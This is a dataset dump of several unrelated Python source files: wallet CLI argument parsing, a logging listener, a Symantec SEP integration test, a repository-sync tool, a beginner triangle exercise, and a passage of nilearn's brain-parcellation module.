argparse._SubParsersAction.__call__ = subparser_call
def add_network_options(parser):
parser.add_argument("-1", "--oneserver", action="store_true", dest="oneserver", default=False, help="connect to one server only")
parser.add_argument("-s", "--server", dest="server", default=None, help="set server host:port:protocol, where protocol is either t (tcp) or s (ssl)")
parser.add_argument("-p", "--proxy", dest="proxy", default=None, help="set proxy [type:]host[:port], where type is socks4,socks5 or http")
def add_global_options(parser):
group = parser.add_argument_group('global options')
group.add_argument("-v", "--verbose", action="store_true", dest="verbose", default=False, help="Show debugging information")
group.add_argument("-D", "--dir", dest="electrum_path", help="electrum directory")
group.add_argument("-P", "--portable", action="store_true", dest="portable", default=False, help="Use local 'electrum-vtc_data' directory")
group.add_argument("-w", "--wallet", dest="wallet_path", help="wallet path")
group.add_argument("--testnet", action="store_true", dest="testnet", default=False, help="Use Testnet")
group.add_argument("--segwit", action="store_true", dest="segwit", default=False, help="The Wizard will create Segwit seed phrases (Testnet only).")
group.add_argument("--nolnet", action="store_true", dest="nolnet", default=False, help="Use Nolnet")
def get_parser():
parser = argparse.ArgumentParser(
epilog="Run 'electrum-vtc help <command>' to see the help for a command")
add_global_options(parser)
subparsers = parser.add_subparsers(dest='cmd', metavar='<command>')
parser_gui = subparsers.add_parser('gui', description="Run Electrum's Graphical User Interface.", help="Run GUI (default)")
parser_gui.add_argument("url", nargs='?', default=None, help="vertcoin URI (or bip70 file)")
parser_gui.add_argument("-g", "--gui", dest="gui", help="select graphical user interface", choices=['qt', 'kivy', 'text', 'stdio', 'vtc'])
parser_gui.add_argument("-o", "--offline", action="store_true", dest="offline", default=False, help="Run offline")
parser_gui.add_argument("-m", action="store_true", dest="hide_gui", default=False, help="hide GUI on startup")
parser_gui.add_argument("-L", "--lang", dest="language", default=None, help="default language used in GUI")
add_network_options(parser_gui)
add_global_options(parser_gui)
# daemon
parser_daemon = subparsers.add_parser('daemon', help="Run Daemon")
parser_daemon.add_argument("subcommand", choices=['start', 'status', 'stop', 'load_wallet', 'close_wallet'], nargs='?')
#parser_daemon.set_defaults(func=run_daemon)
add_network_options(parser_daemon)
add_global_options(parser_daemon)
# commands
for cmdname in sorted(known_commands.keys()):
cmd = known_commands[cmdname]
p = subparsers.add_parser(cmdname, help=cmd.help, description=cmd.description)
add_global_options(p)
if cmdname == 'restore':
p.add_argument("-o", "--offline", action="store_true", dest="offline", default=False, help="Run offline")
for optname, default in zip(cmd.options, cmd.defaults):
a, b, help = command_options[optname]
action = "store_true" if type(default) is bool else 'store'
args = (a, b) if a else (b,)
if action == 'store':
_type = arg_types.get(optname, str)
p.add_argument(*args, dest=optname, action=action, default=default, help=help, type=_type)
else:
p.add_argument(*args, dest=optname, action=action, default=default, help=help)
for param in cmd.params:
h = param_descriptions.get(param, '')
_type = arg_types.get(param, str)
p.add_argument(param, help=h, type=_type)
cvh = config_variables.get(cmdname)
if cvh:
group = p.add_argument_group('configuration variables', '(set with setconfig/getconfig)')
for k, v in cvh.items():
group.add_argument(k, nargs='?', help=v)
# 'gui' is the default command
parser.set_default_subparser('gui')
return parser
| true
| true
|
1c4931b2ce54ed4a4a4fea489199492662beed88
| 482
|
py
|
Python
|
tradingsignal/listeners/logging_listener.py
|
TradingSignal/TradingSignal
|
7fd828fe51832addea65b928193ce625bd091f2c
|
[
"Apache-2.0"
] | 5
|
2020-10-06T14:39:06.000Z
|
2021-01-29T22:57:43.000Z
|
tradingsignal/listeners/logging_listener.py
|
TradingSignal/TradingSignal
|
7fd828fe51832addea65b928193ce625bd091f2c
|
[
"Apache-2.0"
] | null | null | null |
tradingsignal/listeners/logging_listener.py
|
TradingSignal/TradingSignal
|
7fd828fe51832addea65b928193ce625bd091f2c
|
[
"Apache-2.0"
] | null | null | null |
from typing import Text, Union, Any, Optional, Dict
from tradingsignal.listeners.event_listeners import EventListener
from tradingsignal.utils import ts_logging
class LoggingListener(EventListener):
"""write the results of data miner into log-file"""
def __init__(self, listener_config: Optional[Dict[Text, Any]] = {}) -> None:
self.listener_config = listener_config
def update(self, message: Union[Text, Any]) -> None:
ts_logging.info(str(message))
| 34.428571
| 80
| 0.736515
|
from typing import Text, Union, Any, Optional, Dict
from tradingsignal.listeners.event_listeners import EventListener
from tradingsignal.utils import ts_logging
class LoggingListener(EventListener):
def __init__(self, listener_config: Optional[Dict[Text, Any]] = {}) -> None:
self.listener_config = listener_config
def update(self, message: Union[Text, Any]) -> None:
ts_logging.info(str(message))
| true
| true
|
1c49322b07d5450efbc1f93e9f32227158b33898
| 2,910
|
py
|
Python
|
fn_sep/tests/test_fn_sep_get_fingerprint_list.py
|
nickpartner-goahead/resilient-community-apps
|
097c0dbefddbd221b31149d82af9809420498134
|
[
"MIT"
] | 65
|
2017-12-04T13:58:32.000Z
|
2022-03-24T18:33:17.000Z
|
fn_sep/tests/test_fn_sep_get_fingerprint_list.py
|
nickpartner-goahead/resilient-community-apps
|
097c0dbefddbd221b31149d82af9809420498134
|
[
"MIT"
] | 48
|
2018-03-02T19:17:14.000Z
|
2022-03-09T22:00:38.000Z
|
fn_sep/tests/test_fn_sep_get_fingerprint_list.py
|
nickpartner-goahead/resilient-community-apps
|
097c0dbefddbd221b31149d82af9809420498134
|
[
"MIT"
] | 95
|
2018-01-11T16:23:39.000Z
|
2022-03-21T11:34:29.000Z
|
# -*- coding: utf-8 -*-
# (c) Copyright IBM Corp. 2010, 2019. All Rights Reserved.
# pragma pylint: disable=unused-argument, no-self-use
"""Tests for fn_sep_get_fingerprint_list function."""
from __future__ import print_function
import pytest
from mock import patch
from resilient_circuits.util import get_config_data, get_function_definition
from resilient_circuits import SubmitTestFunction, FunctionResult
from mock_artifacts import mocked_sep_client, get_mock_config
PACKAGE_NAME = "fn_sep"
FUNCTION_NAME = "fn_sep_get_fingerprint_list"
# Read the default configuration-data section from the package
config_data = get_mock_config()
# Provide a simulation of the Resilient REST API (uncomment to connect to a real appliance)
resilient_mock = "pytest_resilient_circuits.BasicResilientMock"
def assert_keys_in(json_obj, *keys):
for key in keys:
assert key in json_obj
def call_fn_sep_get_fingerprint_list_function(circuits, function_params, timeout=10):
# Fire a message to the function
evt = SubmitTestFunction("fn_sep_get_fingerprint_list", function_params)
circuits.manager.fire(evt)
event = circuits.watcher.wait("fn_sep_get_fingerprint_list_result", parent=evt, timeout=timeout)
assert event
assert isinstance(event.kwargs["result"], FunctionResult)
pytest.wait_for(event, "complete", True)
return event.kwargs["result"].value
class TestFnSepGetFingerprintList:
""" Tests for the fn_sep_get_fingerprint_list function"""
def test_function_definition(self):
""" Test that the package provides customization_data that defines the function """
func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)
assert func is not None
@patch('fn_sep.components.fn_sep_get_fingerprint_list.Sepclient', side_effect=mocked_sep_client)
@pytest.mark.parametrize("sep_domainid, sep_fingerprintlist_id, sep_fingerprintlist_name, expected_results", [
("A9B4B7160946C25D24B6AA458EF5557F", "Blacklist", None, "582F9B6E0CC4C1DBBD772AAAF088CB3A")
])
def test_success(self, mock_get, circuits_app, sep_domainid, sep_fingerprintlist_id, sep_fingerprintlist_name,
expected_results):
""" Test calling with sample values for the parameters """
keys = ["content", "inputs", "metrics", "raw", "reason", "success", "version"]
keys_2 = ["data", "description", "groupIds", "hashType", "id", "name", "source"]
function_params = {
"sep_domainid": sep_domainid,
"sep_fingerprintlist_name": sep_fingerprintlist_name,
"sep_fingerprintlist_id": sep_fingerprintlist_id
}
results = call_fn_sep_get_fingerprint_list_function(circuits_app, function_params)
assert_keys_in(results, *keys)
content = results["content"]
assert_keys_in(content, *keys_2)
assert expected_results == content["data"][0]
| 43.432836
| 114
| 0.74433
|
from __future__ import print_function
import pytest
from mock import patch
from resilient_circuits.util import get_config_data, get_function_definition
from resilient_circuits import SubmitTestFunction, FunctionResult
from mock_artifacts import mocked_sep_client, get_mock_config
PACKAGE_NAME = "fn_sep"
FUNCTION_NAME = "fn_sep_get_fingerprint_list"
config_data = get_mock_config()
resilient_mock = "pytest_resilient_circuits.BasicResilientMock"
def assert_keys_in(json_obj, *keys):
for key in keys:
assert key in json_obj
def call_fn_sep_get_fingerprint_list_function(circuits, function_params, timeout=10):
evt = SubmitTestFunction("fn_sep_get_fingerprint_list", function_params)
circuits.manager.fire(evt)
event = circuits.watcher.wait("fn_sep_get_fingerprint_list_result", parent=evt, timeout=timeout)
assert event
assert isinstance(event.kwargs["result"], FunctionResult)
pytest.wait_for(event, "complete", True)
return event.kwargs["result"].value
class TestFnSepGetFingerprintList:
def test_function_definition(self):
func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)
assert func is not None
@patch('fn_sep.components.fn_sep_get_fingerprint_list.Sepclient', side_effect=mocked_sep_client)
@pytest.mark.parametrize("sep_domainid, sep_fingerprintlist_id, sep_fingerprintlist_name, expected_results", [
("A9B4B7160946C25D24B6AA458EF5557F", "Blacklist", None, "582F9B6E0CC4C1DBBD772AAAF088CB3A")
])
def test_success(self, mock_get, circuits_app, sep_domainid, sep_fingerprintlist_id, sep_fingerprintlist_name,
expected_results):
keys = ["content", "inputs", "metrics", "raw", "reason", "success", "version"]
keys_2 = ["data", "description", "groupIds", "hashType", "id", "name", "source"]
function_params = {
"sep_domainid": sep_domainid,
"sep_fingerprintlist_name": sep_fingerprintlist_name,
"sep_fingerprintlist_id": sep_fingerprintlist_id
}
results = call_fn_sep_get_fingerprint_list_function(circuits_app, function_params)
assert_keys_in(results, *keys)
content = results["content"]
assert_keys_in(content, *keys_2)
assert expected_results == content["data"][0]
| true
| true
|
1c49329107cffec488cce739bd64e89247a4a335
| 6,661
|
py
|
Python
|
sync_repositories/__main__.py
|
whisperity/sync-repositories
|
3dfa99e34ed39cfd9849e08a365f368484606a71
|
[
"MIT"
] | null | null | null |
sync_repositories/__main__.py
|
whisperity/sync-repositories
|
3dfa99e34ed39cfd9849e08a365f368484606a71
|
[
"MIT"
] | null | null | null |
sync_repositories/__main__.py
|
whisperity/sync-repositories
|
3dfa99e34ed39cfd9849e08a365f368484606a71
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""
SYNOPSIS: Automatically updates every found source code repository in the
current tree, or the specified path.
"""
import argparse
import os
import subprocess
import sys
from sync_repositories.credentials import Backends
from sync_repositories.credentials import keyring as kr
from sync_repositories.repository import get_repositories
def _main():
# Go into askpass-wrapper mode if the environment specifies it.
if 'SR_ASKPASS' in os.environ:
from sync_repositories.credentials import auto_askpass
auto_askpass.execute()
# Make sure execution doesn't flow through.
raise RuntimeError("askpass_wrapper didn't terminate properly.")
ARGS = argparse.ArgumentParser(
description="""Synchronise source control repositories found in the
current tree.""",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
ARGS.add_argument('root_folder',
help="""The root of the directory tree where update
should be run.""",
nargs='?',
default=os.getcwd())
ARGS.add_argument('--do-not-ask', '--daemon', '-d',
dest='daemon',
action='store_true',
help="""Perform an automatic update of repositories,
skipping a repository if user interaction
would be necessary.""")
argv = ARGS.parse_args()
keyring = kr.SecretStorage.get_storage()
print("Checking '%s' for repositories..." % argv.root_folder,
file=sys.stderr)
repository_to_update_data = {}
# Perform a check that every repository's authentication status is known.
for repo in get_repositories(argv.root_folder):
repo_data = list()
for remote, url, parts in repo.get_remotes():
check_authentication = keyring.is_requiring_authentication(*parts)
needs_credentials, can_update = None, False
if check_authentication is None:
# We don't know yet whether the server requires
# authentication or not.
auth_checker = repo.get_auth_requirement_detector_for(
remote)()
try:
if auth_checker.check():
keyring.set_authenticating(*parts)
needs_credentials = True
else:
keyring.set_unauthenticated(*parts)
needs_credentials = False
can_update = True
except subprocess.CalledProcessError as cpe:
print("Failed to execute authentication check for "
"repository '%s' remote '%s':"
% (repo.path, remote))
print(cpe)
continue
elif check_authentication is False:
# We know that the server does not require authentication.
needs_credentials, can_update = False, True
else:
# We know that the server requires authentication.
needs_credentials = True
auth_backend = repo.get_authentication_method(remote)
if auth_backend == Backends.KEYRING:
if needs_credentials:
# If we realised that credentials are needed, check if
# credentials are properly known.
credentials_stored = keyring.get_credentials(*parts)
if not credentials_stored:
print("The repository '%s' has a remote server '%s' "
"is connected to, but the authentication "
"details for this server are not known!"
% (repo.path, remote))
if not argv.daemon:
# ... unless running in daemon mode, in which
# case the user won't be asked.
kr.discuss_keyring_security()
u, p = kr.ask_user_for_password(
keyring, url, parts, can_be_empty=False)
# Check if the given credentials are valid.
auth_checker = repo \
.get_auth_requirement_detector_for(remote)(
u, p)
if auth_checker.check_credentials():
can_update = True
else:
print("Invalid credentials given!",
file=sys.stderr)
protocol, server, port, objname = parts
keyring.delete_credential(protocol,
server,
port,
u,
objname)
else:
can_update = True
if can_update:
repo_data.append((remote, url, parts))
else:
print("... Skipping this repository from update.")
continue
repository_to_update_data[repo] = repo_data
# Update repositories that had been selected for actual update.
print("Performing repository updates...")
for repo, data in repository_to_update_data.items():
for remote, url, parts in data:
print("Updating '%s' from remote '%s'..." % (repo.path, remote))
auth_backend = repo.get_authentication_method(remote)
update_success = False
if auth_backend == Backends.KEYRING:
kr_creds = keyring.get_credentials(*parts)
if not kr_creds:
# If the server doesn't require authentication, don't
# provide credentials.
kr_creds = [(None, None)]
for kr_cred in kr_creds:
updater = repo.get_updater_for(remote)(*kr_cred)
update_success = update_success or updater.update()
if not update_success:
print("Failed to update '%s' from remote '%s'!"
% (repo.path, remote),
file=sys.stderr)
if __name__ == '__main__':
_main()
| 42.698718
| 78
| 0.513436
|
import argparse
import os
import subprocess
import sys
from sync_repositories.credentials import Backends
from sync_repositories.credentials import keyring as kr
from sync_repositories.repository import get_repositories
def _main():
if 'SR_ASKPASS' in os.environ:
from sync_repositories.credentials import auto_askpass
auto_askpass.execute()
raise RuntimeError("askpass_wrapper didn't terminate properly.")
ARGS = argparse.ArgumentParser(
description="""Synchronise source control repositories found in the
current tree.""",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
ARGS.add_argument('root_folder',
help="""The root of the directory tree where update
should be run.""",
nargs='?',
default=os.getcwd())
ARGS.add_argument('--do-not-ask', '--daemon', '-d',
dest='daemon',
action='store_true',
help="""Perform an automatic update of repositories,
skipping a repository if user interaction
would be necessary.""")
argv = ARGS.parse_args()
keyring = kr.SecretStorage.get_storage()
print("Checking '%s' for repositories..." % argv.root_folder,
file=sys.stderr)
repository_to_update_data = {}
for repo in get_repositories(argv.root_folder):
repo_data = list()
for remote, url, parts in repo.get_remotes():
check_authentication = keyring.is_requiring_authentication(*parts)
needs_credentials, can_update = None, False
if check_authentication is None:
# We don't know yet whether the server requires
auth_checker = repo.get_auth_requirement_detector_for(
remote)()
try:
if auth_checker.check():
keyring.set_authenticating(*parts)
needs_credentials = True
else:
keyring.set_unauthenticated(*parts)
needs_credentials = False
can_update = True
except subprocess.CalledProcessError as cpe:
print("Failed to execute authentication check for "
"repository '%s' remote '%s':"
% (repo.path, remote))
print(cpe)
continue
elif check_authentication is False:
needs_credentials, can_update = False, True
else:
needs_credentials = True
auth_backend = repo.get_authentication_method(remote)
if auth_backend == Backends.KEYRING:
if needs_credentials:
credentials_stored = keyring.get_credentials(*parts)
if not credentials_stored:
print("The repository '%s' has a remote server '%s' "
"is connected to, but the authentication "
"details for this server are not known!"
% (repo.path, remote))
if not argv.daemon:
kr.discuss_keyring_security()
u, p = kr.ask_user_for_password(
keyring, url, parts, can_be_empty=False)
# Check if the given credentials are valid.
auth_checker = repo \
.get_auth_requirement_detector_for(remote)(
u, p)
if auth_checker.check_credentials():
can_update = True
else:
print("Invalid credentials given!",
file=sys.stderr)
protocol, server, port, objname = parts
keyring.delete_credential(protocol,
server,
port,
u,
objname)
else:
can_update = True
if can_update:
repo_data.append((remote, url, parts))
else:
print("... Skipping this repository from update.")
continue
repository_to_update_data[repo] = repo_data
# Update repositories that had been selected for actual update.
print("Performing repository updates...")
for repo, data in repository_to_update_data.items():
for remote, url, parts in data:
print("Updating '%s' from remote '%s'..." % (repo.path, remote))
auth_backend = repo.get_authentication_method(remote)
update_success = False
if auth_backend == Backends.KEYRING:
kr_creds = keyring.get_credentials(*parts)
if not kr_creds:
# If the server doesn't require authentication, don't
# provide credentials.
kr_creds = [(None, None)]
for kr_cred in kr_creds:
updater = repo.get_updater_for(remote)(*kr_cred)
update_success = update_success or updater.update()
if not update_success:
print("Failed to update '%s' from remote '%s'!"
% (repo.path, remote),
file=sys.stderr)
if __name__ == '__main__':
_main()
| true
| true
|
1c4932be8e576569e3c4e7823db66650224b721f
| 994
|
py
|
Python
|
pythonbrasil/exercicios/decisao/DE resp 15.py
|
adinsankofa/python
|
8f2f26c77015c0baaa76174e004406b4115272c7
|
[
"MIT"
] | null | null | null |
pythonbrasil/exercicios/decisao/DE resp 15.py
|
adinsankofa/python
|
8f2f26c77015c0baaa76174e004406b4115272c7
|
[
"MIT"
] | null | null | null |
pythonbrasil/exercicios/decisao/DE resp 15.py
|
adinsankofa/python
|
8f2f26c77015c0baaa76174e004406b4115272c7
|
[
"MIT"
] | null | null | null |
'''
Faça um Programa que peça os 3 lados de um triângulo. O programa deverá
informar se os valores podem ser um triângulo. Indique, caso os lados
formem um triângulo, se o mesmo é: equilátero, isósceles ou escaleno.
Dicas:
Três lados formam um triângulo quando a soma de quaisquer dois lados
for maior que o terceiro;
Triângulo Equilátero: três lados iguais;
Triângulo Isósceles: quaisquer dois lados iguais;
Triângulo Escaleno: três lados diferentes;
'''
### ALGORITMO ###
a = int(input("Digite o lado A: "))
b = int(input("Digite o lado B: "))
c = int(input("Digite o lado C: "))
if a == b == c:
print("Equilatero")
elif a == b != c or a != b == c or a == c != b:
print("Isóceles")
elif a != b != c and a != c != b:
print("Escaleno")
### FUNÇÃO ###
def triangulo(a,b,c):
if a == b == c:
print("Equilatero")
elif a == b != c or a != b == c or a == c != b:
print("Isóceles")
elif a != b != c and a != c != b:
print("Escaleno")
| 27.611111
| 71
| 0.610664
|
a = int(input("Digite o lado A: "))
b = int(input("Digite o lado B: "))
c = int(input("Digite o lado C: "))
if a == b == c:
print("Equilatero")
elif a == b != c or a != b == c or a == c != b:
print("Isóceles")
elif a != b != c and a != c != b:
print("Escaleno")
def triangulo(a,b,c):
if a == b == c:
print("Equilatero")
elif a == b != c or a != b == c or a == c != b:
print("Isóceles")
elif a != b != c and a != c != b:
print("Escaleno")
| true
| true
|
1c4932ce9eee5168bc71bca608758c9f07cc6305
| 19,257
|
py
|
Python
|
nilearn/regions/parcellations.py
|
celinede/nilearn
|
901a627c4c5ae491fef19d58307805b3657b3b7e
|
[
"BSD-2-Clause"
] | null | null | null |
nilearn/regions/parcellations.py
|
celinede/nilearn
|
901a627c4c5ae491fef19d58307805b3657b3b7e
|
[
"BSD-2-Clause"
] | null | null | null |
nilearn/regions/parcellations.py
|
celinede/nilearn
|
901a627c4c5ae491fef19d58307805b3657b3b7e
|
[
"BSD-2-Clause"
] | null | null | null |
"""Parcellation tools such as KMeans or Ward for fMRI images
"""
import numpy as np
from sklearn.base import clone
from sklearn.feature_extraction import image
from sklearn.externals.joblib import Memory, delayed, Parallel
from .rena_clustering import ReNA
from ..decomposition.multi_pca import MultiPCA
from ..input_data import NiftiLabelsMasker
from .._utils.compat import _basestring
from .._utils.niimg import _safe_get_data
from .._utils.niimg_conversions import _iter_check_niimg
def _estimator_fit(data, estimator, method=None):
""" Estimator to fit on the data matrix
Parameters
----------
data: numpy array
Data matrix
estimator: instance of estimator from sklearn
MiniBatchKMeans or AgglomerativeClustering
method: str, {'kmeans', 'ward', 'complete', 'average', 'rena'}
A method to choose between for brain parcellations.
Returns
-------
labels_: numpy.ndarray
labels_ estimated from estimator
"""
if method == 'rena':
rena = ReNA(mask_img=estimator.mask_img,
n_clusters=estimator.n_clusters,
scaling=estimator.scaling,
n_iter=estimator.n_iter,
threshold=estimator.threshold,
memory=estimator.memory,
memory_level=estimator.memory_level,
verbose=estimator.verbose)
rena.fit(data)
labels_ = rena.labels_
else:
estimator = clone(estimator)
estimator.fit(data.T)
labels_ = estimator.labels_
return labels_
def _check_parameters_transform(imgs, confounds):
"""A helper function to check the parameters and prepare for processing
as a list.
"""
if not isinstance(imgs, (list, tuple)) or \
isinstance(imgs, _basestring):
imgs = [imgs, ]
single_subject = True
elif isinstance(imgs, (list, tuple)) and len(imgs) == 1:
single_subject = True
else:
single_subject = False
if confounds is None and isinstance(imgs, (list, tuple)):
confounds = [None] * len(imgs)
if confounds is not None:
if not isinstance(confounds, (list, tuple)) or \
isinstance(confounds, _basestring):
confounds = [confounds, ]
if len(confounds) != len(imgs):
raise ValueError("Number of confounds given does not match with "
"the given number of images.")
return imgs, confounds, single_subject
def _labels_masker_extraction(img, masker, confound):
""" Helper function for parallelizing NiftiLabelsMasker extractor
on list of Nifti images.
Parameters
----------
img: 4D Nifti image like object
Image to process.
masker: instance of NiftiLabelsMasker
Used for extracting signals with fit_transform
confound: csv file or numpy array
Confound used for signal cleaning while extraction.
Passed to signal.clean
Returns
-------
signals: numpy array
Signals extracted on given img
"""
masker = clone(masker)
signals = masker.fit_transform(img, confounds=confound)
return signals
class Parcellations(MultiPCA):
"""Learn parcellations on fMRI images.
Five different types of clustering methods can be used:
kmeans, ward, complete, average and rena.
kmeans will call MiniBatchKMeans whereas
ward, complete, average are used within in Agglomerative Clustering and
rena will call ReNA.
kmeans, ward, complete, average are leveraged from scikit-learn.
rena is buit into nilearn.
.. versionadded:: 0.4.1
Parameters
----------
method: str, {'kmeans', 'ward', 'complete', 'average', 'rena'}
A method to choose between for brain parcellations.
For a small number of parcels, kmeans is usually advisable.
For a large number of parcellations (several hundreds, or thousands),
ward and rena are the best options. Ward will give higher quality
parcels, but with increased computation time. ReNA is most useful as a
fast data-reduction step, typically dividing the signal size by ten.
n_parcels: int, default=50
Number of parcellations to divide the brain data into.
random_state: int or RandomState
Pseudo number generator state used for random sampling.
mask: Niimg-like object or NiftiMasker, MultiNiftiMasker instance
Mask/Masker used for masking the data.
If mask image if provided, it will be used in the MultiNiftiMasker.
If an instance of MultiNiftiMasker is provided, then this instance
parameters will be used in masking the data by overriding the default
masker parameters.
If None, mask will be automatically computed by a MultiNiftiMasker
with default parameters.
smoothing_fwhm: float, optional default=4.
If smoothing_fwhm is not None, it gives the full-width half maximum in
millimeters of the spatial smoothing to apply to the signal.
standardize: boolean, optional
If standardize is True, the time-series are centered and normed:
their mean is put to 0 and their variance to 1 in the time dimension.
detrend: boolean, optional
Whether to detrend signals or not.
This parameter is passed to signal.clean. Please see the related
documentation for details
low_pass: None or float, optional
This parameter is passed to signal.clean. Please see the related
documentation for details
high_pass: None or float, optional
This parameter is passed to signal.clean. Please see the related
documentation for details
t_r: float, optional
This parameter is passed to signal.clean. Please see the related
documentation for details
target_affine: 3x3 or 4x4 matrix, optional
This parameter is passed to image.resample_img. Please see the
related documentation for details. The given affine will be
considered as same for all given list of images.
target_shape: 3-tuple of integers, optional
This parameter is passed to image.resample_img. Please see the
related documentation for details.
mask_strategy: {'background', 'epi' or 'template'}, optional
The strategy used to compute the mask: use 'background' if your
images present a clear homogeneous background, 'epi' if they
are raw EPI images, or you could use 'template' which will
extract the gray matter part of your data by resampling the MNI152
brain mask for your data's field of view.
Depending on this value, the mask will be computed from
masking.compute_background_mask, masking.compute_epi_mask or
masking.compute_gray_matter_mask. Default is 'epi'.
mask_args: dict, optional
If mask is None, these are additional parameters passed to
masking.compute_background_mask or masking.compute_epi_mask
to fine-tune mask computation. Please see the related documentation
for details.
scaling: bool, optional (default False)
Used only when the method selected is 'rena'. If scaling is True, each
cluster is scaled by the square root of its size, preserving the
l2-norm of the image.
n_iter: int, optional (default 10)
Used only when the method selected is 'rena'. Number of iterations of
the recursive neighbor agglomeration.
memory: instance of joblib.Memory or str
Used to cache the masking process.
By default, no caching is done. If a string is given, it is the
path to the caching directory.
memory_level: integer, optional
Rough estimator of the amount of memory used by caching. Higher value
means more memory for caching.
n_jobs: integer, optional
The number of CPUs to use to do the computation. -1 means
'all CPUs', -2 'all CPUs but one', and so on.
verbose: integer, optional
Indicate the level of verbosity. By default, nothing is printed.
Attributes
----------
`labels_img_`: Nifti1Image
Labels image to each parcellation learned on fmri images.
`masker_`: instance of NiftiMasker or MultiNiftiMasker
The masker used to mask the data
`connectivity_`: numpy.ndarray
voxel-to-voxel connectivity matrix computed from a mask.
Note that this attribute is only seen if selected methods are
Agglomerative Clustering type, 'ward', 'complete', 'average'.
Notes
-----
* Transforming list of Nifti images to data matrix takes few steps.
Reducing the data dimensionality using randomized SVD, build brain
parcellations using KMeans or various Agglomerative methods.
* This object uses spatially-constrained AgglomerativeClustering for
method='ward' or 'complete' or 'average' and spatially-constrained
ReNA clustering for method='rena'. Spatial connectivity matrix
(voxel-to-voxel) is built-in object which means no need of explicitly
giving the matrix.
"""
VALID_METHODS = ['kmeans', 'ward', 'complete', 'average', 'rena']
def __init__(self, method, n_parcels=50,
random_state=0, mask=None, smoothing_fwhm=4.,
standardize=False, detrend=False,
low_pass=None, high_pass=None, t_r=None,
target_affine=None, target_shape=None,
mask_strategy='epi', mask_args=None,
scaling=False, n_iter=10,
memory=Memory(cachedir=None),
memory_level=0, n_jobs=1, verbose=1):
self.method = method
self.n_parcels = n_parcels
self.scaling = scaling
self.n_iter = n_iter
MultiPCA.__init__(self, n_components=200,
random_state=random_state,
mask=mask, memory=memory,
smoothing_fwhm=smoothing_fwhm,
standardize=standardize, detrend=detrend,
low_pass=low_pass, high_pass=high_pass,
t_r=t_r, target_affine=target_affine,
target_shape=target_shape,
mask_strategy=mask_strategy,
mask_args=mask_args,
memory_level=memory_level,
n_jobs=n_jobs,
verbose=verbose)
def _raw_fit(self, data):
""" Fits the parcellation method on this reduced data.
Data are coming from a base decomposition estimator which computes
the mask and reduces the dimensionality of images using
randomized_svd.
Parameters
----------
data: ndarray
Shape (n_samples, n_features)
Returns
-------
labels: numpy.ndarray
Labels to each cluster in the brain.
connectivity: numpy.ndarray
voxel-to-voxel connectivity matrix computed from a mask.
Note that, this attribute is returned only for selected methods
such as 'ward', 'complete', 'average'.
"""
valid_methods = self.VALID_METHODS
if self.method is None:
raise ValueError("Parcellation method is specified as None. "
"Please select one of the method in "
"{0}".format(valid_methods))
if self.method is not None and self.method not in valid_methods:
raise ValueError("The method you have selected is not implemented "
"'{0}'. Valid methods are in {1}"
.format(self.method, valid_methods))
# we delay importing Ward or AgglomerativeClustering and same
# time import plotting module before that.
# Because sklearn.cluster imports scipy hierarchy and hierarchy imports
# matplotlib. So, we force import matplotlib first using our
# plotting to avoid backend display error with matplotlib
# happening in Travis
try:
from nilearn import plotting
except Exception:
pass
components = MultiPCA._raw_fit(self, data)
mask_img_ = self.masker_.mask_img_
if self.verbose:
print("[{0}] computing {1}".format(self.__class__.__name__,
self.method))
if self.method == 'kmeans':
from sklearn.cluster import MiniBatchKMeans
kmeans = MiniBatchKMeans(n_clusters=self.n_parcels,
init='k-means++',
random_state=self.random_state,
verbose=max(0, self.verbose - 1))
labels = self._cache(_estimator_fit,
func_memory_level=1)(components.T, kmeans)
elif self.method == 'rena':
rena = ReNA(mask_img_, n_clusters=self.n_parcels,
scaling=self.scaling, n_iter=self.n_iter,
memory=self.memory, memory_level=self.memory_level,
verbose=max(0, self.verbose - 1))
method = 'rena'
labels = \
self._cache(_estimator_fit, func_memory_level=1)(components.T,
rena, method)
else:
mask_ = _safe_get_data(mask_img_).astype(np.bool)
shape = mask_.shape
connectivity = image.grid_to_graph(n_x=shape[0], n_y=shape[1],
n_z=shape[2], mask=mask_)
from sklearn.cluster import AgglomerativeClustering
agglomerative = AgglomerativeClustering(
n_clusters=self.n_parcels, connectivity=connectivity,
linkage=self.method, memory=self.memory)
labels = self._cache(_estimator_fit,
func_memory_level=1)(components.T,
agglomerative)
self.connectivity_ = connectivity
# Avoid 0 label
labels = labels + 1
self.labels_img_ = self.masker_.inverse_transform(labels)
return self
def _check_fitted(self):
"""Helper function to check whether fit is called or not.
"""
if not hasattr(self, 'labels_img_'):
raise ValueError("Object has no labels_img_ attribute. "
"Ensure that fit() is called before transform.")
def transform(self, imgs, confounds=None):
"""Extract signals from parcellations learned on fmri images.
Parameters
----------
imgs: List of Nifti-like images
See http://nilearn.github.io/manipulating_images/input_output.html.
Images to process.
confounds: List of CSV files or arrays-like, optional
Each file or numpy array in a list should have shape
(number of scans, number of confounds)
This parameter is passed to signal.clean. Please see the related
documentation for details. Must be of same length of imgs.
Returns
-------
region_signals: List of or 2D numpy.ndarray
Signals extracted for each label for each image.
Example, for single image shape will be
(number of scans, number of labels)
"""
self._check_fitted()
imgs, confounds, single_subject = _check_parameters_transform(
imgs, confounds)
# Requires for special cases like extracting signals on list of
# 3D images
imgs_list = _iter_check_niimg(imgs, atleast_4d=True)
masker = NiftiLabelsMasker(self.labels_img_,
mask_img=self.masker_.mask_img_,
smoothing_fwhm=self.smoothing_fwhm,
standardize=self.standardize,
detrend=self.detrend,
low_pass=self.low_pass,
high_pass=self.high_pass, t_r=self.t_r,
resampling_target='data',
memory=self.memory,
memory_level=self.memory_level,
verbose=self.verbose)
region_signals = Parallel(n_jobs=self.n_jobs)(
delayed(self._cache(_labels_masker_extraction,
func_memory_level=2))
(img, masker, confound)
for img, confound in zip(imgs_list, confounds))
if single_subject:
return region_signals[0]
else:
return region_signals
def fit_transform(self, imgs, confounds=None):
"""Fit the images to parcellations and then transform them.
Parameters
----------
imgs: List of Nifti-like images
See http://nilearn.github.io/manipulating_images/input_output.html.
Images for process for fit as well for transform to signals.
confounds: List of CSV files or arrays-like, optional
Each file or numpy array in a list should have shape
(number of scans, number of confounds).
This parameter is passed to signal.clean. Given confounds
should have same length as images if given as a list.
Note: same confounds will used for cleaning signals before
learning parcellations.
Returns
-------
region_signals: List of or 2D numpy.ndarray
Signals extracted for each label for each image.
Example, for single image shape will be
(number of scans, number of labels)
